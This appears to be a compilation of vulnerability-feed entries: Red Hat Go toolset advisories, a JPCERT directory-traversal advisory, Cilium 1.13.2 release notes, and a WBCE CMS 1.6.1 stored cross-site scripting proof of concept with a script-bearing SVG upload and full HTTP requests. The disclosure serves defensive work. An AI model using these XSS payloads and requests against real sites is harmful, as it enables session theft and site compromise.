Red Hat Security Advisory 2023-3323-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset-1.19 and go-toolset-1.19-golang security update  
Advisory ID:       RHSA-2023:3323-01  
Product:           Red Hat Developer Tools  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3323  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24537 CVE-2023-24538 CVE-2023-24539   
                   CVE-2023-24540 CVE-2023-29400   
=====================================================================

1. Summary:

An update for go-toolset-1.19 and go-toolset-1.19-golang is now available  
for Red Hat Developer Tools.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64le, s390x, x86_64  
Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

* golang: go/parser: Infinite loop in parsing (CVE-2023-24537)

* golang: html/template: backticks not treated as string delimiters  
(CVE-2023-24538)

* golang: html/template: improper sanitization of CSS values  
(CVE-2023-24539)

* golang: html/template: improper handling of empty HTML attributes  
(CVE-2023-29400)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2184481 - CVE-2023-24538 golang: html/template: backticks not treated as string delimiters  
2184484 - CVE-2023-24537 golang: go/parser: Infinite loop in parsing  
2196026 - CVE-2023-24539 golang: html/template: improper sanitization of CSS values  
2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace  
2196029 - CVE-2023-29400 golang: html/template: improper handling of empty HTML attributes

6. Package List:

Red Hat Developer Tools for Red Hat Enterprise Linux Server (v. 7):

Source:  
go-toolset-1.19-1.19.9-1.el7_9.src.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.src.rpm

noarch:  
go-toolset-1.19-golang-docs-1.19.9-1.el7_9.noarch.rpm

ppc64le:  
go-toolset-1.19-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.ppc64le.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.ppc64le.rpm

s390x:  
go-toolset-1.19-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.s390x.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.s390x.rpm

x86_64:  
go-toolset-1.19-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-race-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.x86_64.rpm

Red Hat Developer Tools for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
go-toolset-1.19-1.19.9-1.el7_9.src.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.src.rpm

noarch:  
go-toolset-1.19-golang-docs-1.19.9-1.el7_9.noarch.rpm

x86_64:  
go-toolset-1.19-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-build-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-bin-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-misc-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-race-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-src-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-golang-tests-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-runtime-1.19.9-1.el7_9.x86_64.rpm  
go-toolset-1.19-scldevel-1.19.9-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG9tRtzjgjWX9erEAQjCSA/+JzEIQeKBJmyOnfKV5sZx20c+nw1vz1R0  
pqsw0rwfEvjBlIo71E4PtBPiwdN6rqaAkrxZ0R95HJC4potAiaF8Sw3ylSEO72Bc  
ODhyHA8WNBR800bxJmLJIbRiOmdS1iDXAhWKAa7CmoHPnQ9o8m6DMOKUkg78v1vb  
fOOgl842d0AAEq25RGj1OjA0SdRYYBe4SFUrZuurB5UZXuaEO6bpFqJW0TJ7bzNQ  
k8DOvNTwGSguOiAlBcbKbX8RDGkRyLMVqBBxHbfY1mCKalDma4GvlHnr680qAmtP  
isN9FEK/DhqVW09Lymvw35ok3ZW95+aKdi3jWXbVPwBCa1AXmFadNWUbVgZ17vg8  
frksYbVj8MdWgVb0k1f5HOMiDhQ/oygo4U0MOnUM8pJYcwuQ9SJbU9wTl5BfpBsX  
jIKwzE1krbTXD77yxaxNXH4EqMEM83F61MqKFPq3hd/BQSS9fXXDaEput+RfCZxX  
ZPrBCNCQo/ity03T4S6+5dFUL9M4VHGXabLhe35YWIfhgOp3DS975GaK1HlZpmvW  
UailJg3zz9i5ouZjoYyXywUnAr9r2PdwD+AE7X8CTE2rwi+f/naqDaTFFQbpsbO9  
sFOlrloPeUDw2cbxXEU6HpGm30+SFsu6gA8vLvdMDgj+gqp5T8Yu24zxSQRRZxsL  
VikMaSs72G4=  
=e8Eb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3323-01

Red Hat Security Advisory 2023-3319-01 - Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: go-toolset:rhel8 security update  
Advisory ID:       RHSA-2023:3319-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3319  
Issue date:        2023-05-25  
CVE Names:         CVE-2023-24540   
=====================================================================

1. Summary:

An update for the go-toolset:rhel8 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Go Toolset provides the Go programming language tools and libraries. Go is  
alternatively known as golang.

Security Fix(es):

* golang: html/template: improper handling of JavaScript whitespace  
(CVE-2023-24540)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2196027 - CVE-2023-24540 golang: html/template: improper handling of JavaScript whitespace

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
delve-1.9.1-1.module+el8.8.0+16778+5fbb74f5.src.rpm  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.src.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.src.rpm

aarch64:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.aarch64.rpm

noarch:  
golang-docs-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-misc-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-src-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm  
golang-tests-1.19.9-1.module+el8.8.0+18857+fca43658.noarch.rpm

ppc64le:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.ppc64le.rpm

s390x:  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.s390x.rpm

x86_64:  
delve-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
delve-debuginfo-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
delve-debugsource-1.9.1-1.module+el8.8.0+16778+5fbb74f5.x86_64.rpm  
go-toolset-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-bin-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm  
golang-race-1.19.9-1.module+el8.8.0+18857+fca43658.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZG9tLtzjgjWX9erEAQhJTw//bl/01d19YrHqzvTMQ9wOgIpyxxA//bnz  
DSLtDLGNjXwq+88UFLmDSTD8PLzTvIIrVqFmeLEBZrQwt9/mP18qBB9byFJHpIKQ  
6MteK+v5+/AFTW9WOJpj23JmspbNfr1HlLAYxwEkGVpD2DMGz78iAK6TmcYnYt8C  
TpfHi3HsxZb8BZi3LASyXb9KppJG38XmU1MfahQE4C1fRD2pCp94QxF0Bgy17ClT  
DuTtEA0m0P7doAAFE4JVVYKjV6B4Ips6viQE3D960MmwFX3sz0XK7Vh2rz1No01G  
vsuJdlzejqL39eAaoL/+6REO/PsSnPyWejgFywxTSGWlomfuPo7R1I2vlqnEbcMc  
Cx708HPPrQK2ZZD8FpfreYSGDQWUbjKorJHl6yH/XHzl8wCC9abTTkwKXK35iW40  
57HU6StsWPsjiatE6loPROlQGXs3cbi1j93px8XZ3f0CFamqEFe8T/IP7rbdZq23  
RK9sFLICiGohJKhUQ2yyqZC6UPvEGxFYEw5RpG850JhG8Ov4VnAusylMUNnKYGYy  
lep4uIV5fwHU6AxVUkwwog9hdltX2igh05KdusbmxpA5vJdE6IhpU5itLhZu34TR  
/SVxQnNSTrJny9WKPVycpBshb+jRYFB8gnEG+GJwY1vuO3lRqwMbu3WUaNWwRny/  
KFSf0a7BsFY=  
=5KHr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3319-01

WBCE CMS version 1.6.1 suffers from a cross site scripting vulnerability.

    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)Version: 1.6.1Bugs:  XSSTechnology: PHPVendor URL: https://wbce-cms.org/Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1Date of found: 03-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)2. upload malicious svg filesvg file content ===><?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>poc request:POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1Host: localhostContent-Length: 976sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-platform: "Linux"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtOAccept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167Connection: close------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="reqid"187de34ea92ac------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="cmd"upload------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="target"l1_Lw------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>------WebKitFormBoundary5u4r3pOGl4EnuBtOContent-Disposition: form-data; name="mtime[]"1683056102------WebKitFormBoundary5u4r3pOGl4EnuBtO--3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)========================================================================================================================###XSS-2###1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)2. add page3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3Epoc request:POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1Host: localhostContent-Length: 143Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475Connection: closepage_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

WBCE CMS 1.6.1 Cross Site Scripting

Directory traversal vulnerability in ESS REC Agent Server Edition series allows an authenticated attacker to view or alter an arbitrary file on the server. Affected products and versions are as follows: ESS REC Agent Server Edition for Linux V1.0.0 to V1.4.3, ESS REC Agent Server Edition for Solaris V1.1.0 to V1.4.0, ESS REC Agent Server Edition for HP-UX V1.1.0 to V1.4.0, and ESS REC Agent Server Edition for AIX V1.2.0 to V1.4.1

Published:2023/05/26  Last Updated:2023/05/26

**Overview**

ESS REC Agent Server Edition for Linux etc. contain a directory traversal vulnerability.

**Products Affected**

*   ESS REC Agent Server Edition for Linux V1.0.0 to V1.4.3
*   ESS REC Agent Server Edition for Solaris V1.1.0 to V1.4.0
*   ESS REC Agent Server Edition for HP-UX V1.1.0 to V1.4.0
*   ESS REC Agent Server Edition for AIX V1.2.0 to V1.4.1

**Description**

ESS REC Agent Server Edition for Linux etc. provided by Encourage Technologies Co.,Ltd. contain a directory traversal vulnerability (CWE-23).

**Impact**

Arbitrary files on the server may be viewed or altered by an attacker.

**Solution**

**Update the software**  
Update the software to the latest version according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:L/AC:L/Au:S/C:C/I:C/A:C

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Hayato Ushimaru of Cyber Defense Institute, Inc. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2023-28382: ESS REC Agent Server Edition for Linux etc. vulnerable to directory traversal

Cilium is a networking, observability, and security solution with an eBPF-based dataplane. This issue only impacts users who have a HTTP policy that applies to multiple `toEndpoints` AND have an allow-all rule in place that affects only one of those endpoints. In such cases, a wildcard rule will be appended to the set of HTTP rules, which could cause bypass of HTTP policies. This issue has been patched in Cilium 1.11.16, 1.12.9, and 1.13.2.

We are pleased to release Cilium v1.13.2.

This release addresses the following security issue:

*   GHSA-pg5p-wwp8-97g8

Note: When updating to this release, make sure that you are using new helm chart version.

**Summary of Changes**

**Known Issues:**

*   There is a known issue (#24502) with CiliumNetworkPolicies that makes the kube-apiserver entity unreliable. Until this is resolved, it is recommended to remain on Cilium v1.12 or earlier if you are using the kube-apiserver entity in your CiliumNetworkPolicies.

**Minor Changes:**

*   envoy: Bump envoy to v1.23.8 (#24909, @sayboras)
*   envoy: Bump envoy version to v1.23.7 (#24746, @sayboras)
*   Move poststart eni script to agent pod from nodeinit pod (Backport PR #24547, Upstream PR #24134, @nebril)
*   Provides operational state of BGP peers via CLI 'cilium bgp peers' (Backport PR #24821, Upstream PR #24612, @harsimran-pabla)
*   Support L2-less devices with fast forward (bpf-based host routing) (Backport PR #24706, Upstream PR #23935, @jschwinger233)

**Bugfixes:**

*   agent: rework clustermesh config watcher for increased robustness (Backport PR #24547, Upstream PR #24163, @giorio94)
*   bpf: dsr: fix parsing of IPv6 AUTH extension header (Backport PR #24821, Upstream PR #24792, @julianwiedmann)
*   bpf: fix ipv6 extension header parsing error (Backport PR #24706, Upstream PR #24309, @chenyuezhou)
*   bpf: policy: fix handling of ICMPv6 packet with extension headers (Backport PR #24821, Upstream PR #24797, @julianwiedmann)
*   Correctly configure extra SANs for the clustermesh API server certificate when generated through certgen (Backport PR #24607, Upstream PR #24339, @giorio94)
*   daemon: initialize datapath before compiling sockops programs (Backport PR #24547, Upstream PR #24140, @jibi)
*   egressgw: update all internal caches once k8s state is synced (Backport PR #24706, Upstream PR #24034, @jibi)
*   endpoint: fix k8sNamespace log field when ep gets deleted (Backport PR #24706, Upstream PR #24575, @mhofstetter)
*   Fix a bug where users are unable to change a wrong remote etcd configuration (Backport PR #24547, Upstream PR #24046, @oblazek)
*   Fix a memory leak in the service cache, and possible missed service updates on scale to zero events in rare circumstances (Backport PR #24706, Upstream PR #24619, @giorio94)
*   Fix bug in BGP CP where changing the route-id of an existing router would cause announcements to disappear (Backport PR #24547, Upstream PR #24304, @dylandreimerink)
*   Fix bug where ingress policies for remote-note identities are not applied correctly new nodes join the cluster, specifically when the nodes joining the cluster had IP addresses specified in CIDR policies (Backport PR #24547, Upstream PR #23764, @christarazi)
*   Fix Cilium Operator from crashing when encountering empty node pools on Azure (Backport PR #24547, Upstream PR #24189, @forgems)
*   Fix for disabled cloud provider rate limiting (Backport PR #24547, Upstream PR #24413, @hemanthmalla)
*   Fix missing delete events on informer re-lists to ensure all delete events are correctly emitted and using the latest known object state, so that all event handlers and stores always reflect the actual apiserver state as best as possible (#24870, @aanm)
*   Fixed bug where L7 rules would be incorrectly merged between rules for the same (remote) endpoint. This bug could have caused L7 rules to be bypassed via a wildcard header rule being improperly appended to the set of HTTP rules when both a policy with HTTP header rules applying to multiple endpoints and an allow-all rule for only one of those endpoints are specified. (Backport PR #24843, Upstream PR #24788, @jrajahalme)
*   gateway-api: Re-queue gateway for namespace change (Backport PR #24758, Upstream PR #24624, @sayboras)
*   Handle leaked service backends that may lead to filling up of lb4_backends map and thereby connectivity issues. (Backport PR #24758, Upstream PR #24681, @aditighag)
*   helm: mandate issuer configuration when using cert-manager to generate certificates (Backport PR #24821, Upstream PR #24666, @giorio94)
*   ipsec: Clean up stale XFRM policies and states (Backport PR #24821, Upstream PR #24773, @pchaigno)
*   Prevent egress gateway from adding and then immediately removing BPF policy entries for policies that don't match any gateway node (Backport PR #24706, Upstream PR #24646, @MrFreezeex)
*   Services backends with publishNotReadyAddresses are able to receive traffic independently if they are Terminating, since is the user intent to make them reachable despite its state. (Backport PR #24547, Upstream PR #24174, @aojea)
*   Set user-agent for k8s client with Cilium's version (Backport PR #24547, Upstream PR #24275, @aanm)
*   Solve control-plane deadlock issues leading to outages. A typical log line indicative of this issue is probe=l7-proxy msg="No response from probe within 15 seconds" (Backport PR #24814, Upstream PR #24672, @bimmlerd)

**CI Changes:**

*   bpf/test: Add unit test to check whether netpol drops result in metric counter increament (Backport PR #24607, Upstream PR #24469, @brb)
*   bpf/tests: fix mac addresses definitions in egressgw test (Backport PR #24607, Upstream PR #23351, @jibi)
*   datapath/linux/route: fix CI expectations for rule string format (Backport PR #24607, Upstream PR #24577, @NikAleksandrov)
*   Fix race conditions when deleting CNP / CCNP in e2e tests (Backport PR #24706, Upstream PR #24484, @jschwinger233)
*   Fixed flake in the TestRequestIPWithMismatchedLabel LB-IPAM tests. (Backport PR #24547, Upstream PR #23297, @dylandreimerink)
*   gha: Clean-up Ingress/GatewayAPI Conformance tests (Backport PR #24441, Upstream PR #24025, @sayboras)
*   Increase timeout waiting for resources in Ingress conformance test (Backport PR #24441, Upstream PR #24388, @meyskens)
*   Port verifier tests to Go (Backport PR #24706, Upstream PR #24538, @ti-mo)
*   renovate: Fix Hubble release digest regex (Backport PR #24547, Upstream PR #24477, @gandro)
*   test: Enable conformance tests for non-SCTP traffic in conjunction with SCTP policies (Backport PR #24547, Upstream PR #24144, @joestringer)
*   test: Remove some {DP,Services} Ginkgo test cases (Backport PR #24547, Upstream PR #24223, @brb)
*   test: Update 1.26 k8s version (Backport PR #24607, Upstream PR #24569, @sayboras)
*   tests: add exceptions for lease errors due to etcd (Backport PR #24758, Upstream PR #24723, @jibi)

**Misc Changes:**

*   Avoid clearing objects in CiliumEndpoint conversion funcs (Backport PR #24929, Upstream PR #24928, @aanm)
*   Avoid clearing objects in conversion funcs (Backport PR #24929, Upstream PR #24241, @odinuge)
*   bgp: extract exportPodCIDRReconciler logic into a generic function (Backport PR #24607, Upstream PR #24546, @jibi)
*   bpf: Remove fib\_redirect's BPF\_FIB\_LOOKUP\_DIRECT (Backport PR #24547, Upstream PR #24271, @borkmann)
*   bpf\_test: use bpf.LoadCollection, print full verifier error logs (Backport PR #24607, Upstream PR #23281, @ti-mo)
*   checker: Fix incorrect checker for ExportedEqual() (Backport PR #24547, Upstream PR #24373, @christarazi)
*   chore(deps): update base-images (v1.13) (#24467, @renovate\[bot\])
*   chore(deps): update dependency cilium/hubble to v0.11.3 (v1.13) (#24799, @renovate\[bot\])
*   chore(deps): update docker.io/library/golang docker tag to v1.19.7 (v1.13) (#24233, @renovate\[bot\])
*   chore(deps): update docker.io/library/golang docker tag to v1.19.7 (v1.13) (#24234, @renovate\[bot\])
*   chore(deps): update docker.io/library/golang docker tag to v1.19.8 (v1.13) (#24800, @renovate\[bot\])
*   chore(deps): update docker.io/library/golang docker tag to v1.19.8 (v1.13) (#24802, @renovate\[bot\])
*   chore(deps): update docker.io/library/golang:1.19.7 docker digest to d2078d2 (v1.13) (#24550, @renovate\[bot\])
*   chore(deps): update docker.io/library/golang:1.19.8 docker digest to 31a2f92 (v1.13) (#24831, @renovate\[bot\])
*   chore(deps): update quay.io/cilium/hubble docker tag to v0.11.3 (v1.13) (#24472, @renovate\[bot\])
*   cilium, docs: Move sig-datapath meeting to on-demand only (Backport PR #24547, Upstream PR #24205, @borkmann)
*   doc: Fixed CiliumNode CRD fields for cluster-pool doc (Backport PR #24547, Upstream PR #24428, @PhilipSchmid)
*   doc: kubeProxyReplacement=strict / kube-proxy co-existence (Backport PR #24547, Upstream PR #24407, @PhilipSchmid)
*   docs: add note that there are two Cilium CLIs (Backport PR #24547, Upstream PR #24435, @lizrice)
*   docs: Cleanup and update list of supported drivers for XDP (Backport PR #24547, Upstream PR #24398, @pchaigno)
*   docs: Document the threat model for Cilium (Backport PR #24706, Upstream PR #24497, @ferozsalam)
*   docs: fix typo in operations/troubleshooting.rst (Backport PR #24547, Upstream PR #24460, @NikAleksandrov)
*   docs: Fix upgradeCompatibility references (Backport PR #24758, Upstream PR #24711, @joestringer)
*   docs: Update Cluster Mesh requirements to mention node InternalIP explicitly (Backport PR #24547, Upstream PR #24164, @jspaleta)
*   docs: Update egress gateway limitations (Backport PR #24547, Upstream PR #24244, @pchaigno)
*   docs: Update the documentation for the --conntrack-gc-interval flag (Backport PR #24547, Upstream PR #24400, @pchaigno)
*   egressgw: change special values for gatewayIP (Backport PR #24849, Upstream PR #24449, @MrFreezeex)
*   Emit full verifier logs to agent logs and verifier.log in the endpoint directory (Backport PR #24706, Upstream PR #24506, @ti-mo)
*   endpoint: correctly log IPv6 addresses (Backport PR #24547, Upstream PR #24255, @tklauser)
*   Expose bpf-lb-sock-hostns-only in cilium status (Backport PR #24758, Upstream PR #24570, @romanspb80)
